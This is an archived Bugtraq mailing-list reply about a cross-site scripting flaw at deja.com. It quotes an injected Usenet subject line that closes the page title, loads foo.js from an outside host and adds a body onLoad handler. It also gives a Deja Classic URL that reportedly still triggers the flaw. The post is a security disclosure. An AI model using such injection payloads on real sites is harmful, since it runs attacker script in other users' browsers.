Re: Malicious-HTML vulnerabilities at deja.com

[dan-bugtraq () DILVISH SPEED NET (Dan Harkless)]

Geert Altena <geert () uttnarag tn utwente nl> writes:
> >   http://www.deja.com/getdoc.xp?AN=591804116
>
> Comes out as (copy/paste from netscape):
> ------------
> > > Forum: alt.test
> > > Thread: </title><script
> > > src="http://www.in-design.com/~nsmart/foo.js";></script><body
> > > onLoad="return bar()">
> > > Message 1 of 1
>
> Subject: </title><script src="http://www.in-design.com/~nsmart/foo.js";>
>          </script><body onLoad="return bar()">
> Date: 03/01/2000
> Author: regkey <regkey () yahoo com>
> --------------
>
> I have javascript enabled, no popup.

Perhaps they fixed the default viewing format, but they didn't fix the "Deja
Classic" interface, which is what I use (as I can't stand the new design).

Try:

    http://www.deja.com/=dnc/getdoc.xp?AN=591804116

At least with Netscape Communicator 4.7 (on NT) that definitely makes a
popup.

Didn't try the redirection one:

> > Redirection using meta tag:
> >
> >   http://www.deja.com/getdoc.xp?AN=591833344

but I suspect the same is true there.

----------------------------------------------------------------------
Dan Harkless                   | To prevent SPAM contamination, please
dan-bugtraq () dilvish speed net  | do not mention this private email
SpeedGate Communications, Inc. | address in Usenet posts.  Thank you.